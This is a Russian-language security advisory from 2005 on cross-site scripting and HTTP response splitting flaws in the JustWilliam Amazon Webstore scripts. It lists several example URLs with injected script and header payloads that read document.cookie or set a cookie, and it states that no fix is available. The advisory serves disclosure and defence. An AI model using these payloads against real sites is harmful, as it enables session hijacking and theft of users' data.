Межсайтовый скриптинг в JustWilliam Amazon Webstore

Дата публикации:	04.05.2005
Всего просмотров:	1244
Опасность:	Низкая
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
	Уязвимые версии: JustWilliam Amazon Webstore Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важным данным других пользователей. Уязвимость существует в сценариях 'index.php' и 'closeup.php' из-за недостаточной фильтрации входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры: http://[target]/store/uk/product/%22%3E%3Cscript%3 Ealert(document.cookie)%3C/script%3E.htm http://[target]/store/uk/product/">%0d%0aSet-Cookie:%20 HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm http://[target]/closeup.php?image=3D%22%3E%3 Cscript%3Eal ert(document.cookie)%3C/script%3E http://[target]/index.php?currentIsExpanded= 3D0%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E&currentNumber=3D8 http://[t arget]/index.php?function=3Dsearch& searchFor=3D%22%3E%3Cscript%3Ealert (document.cookie)%3C/script%3E http://[target]/uk/list/c/software_CAD_Technical _60002_uk.htm?currentNumber=3D4.3%22% 3E%3Cscript%3Ealert(document.cookie)%3C/ script%3E&currentIsExpanded=3D0 URL производителей: scripts.justwilliams.com/amazon/index.htm Решение: Способов устранения уязвимости не существует в настоящее время.
Ссылки:	JustWilliam's Amazon Webstore Input Validation Holes Permit Cross-Site Scripting Attacks

Межсайтовый скриптинг в JustWilliam Amazon Webstore

Подпишитесь на email рассылку